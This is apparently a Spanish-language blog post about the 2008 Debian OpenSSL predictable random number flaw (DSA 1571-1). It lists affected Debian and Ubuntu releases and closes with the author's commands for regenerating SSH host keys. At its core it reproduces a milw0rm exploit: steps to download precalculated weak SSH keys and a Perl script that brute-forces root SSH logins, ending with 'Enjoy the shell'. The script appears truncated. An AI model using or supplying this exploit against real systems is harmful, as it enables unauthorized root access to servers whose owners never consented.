
[SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator

Vulnerabilidad crítica en las claves OpenSSL de Debian y las basadas en debian tambien.

Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 lpia
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0

Anuncio en debian

en MilwOrm

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/\n";
print "By mm@deadbeef.de\n";
exit 0;
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();

5. Enjoy the shell after some minutes (less than 20 minutes)

Markus Mueller

# milw0rm.com [2008-05-15]

Yo en mi sistema hice lo siguiente:

# rm /etc/ssh/ssh_host_*

Y después las he regenerado con:

# dpkg-reconfigure -plow openssh-server

Y todo perfecto.

Esto lo leei en un post de haplo en esDebian

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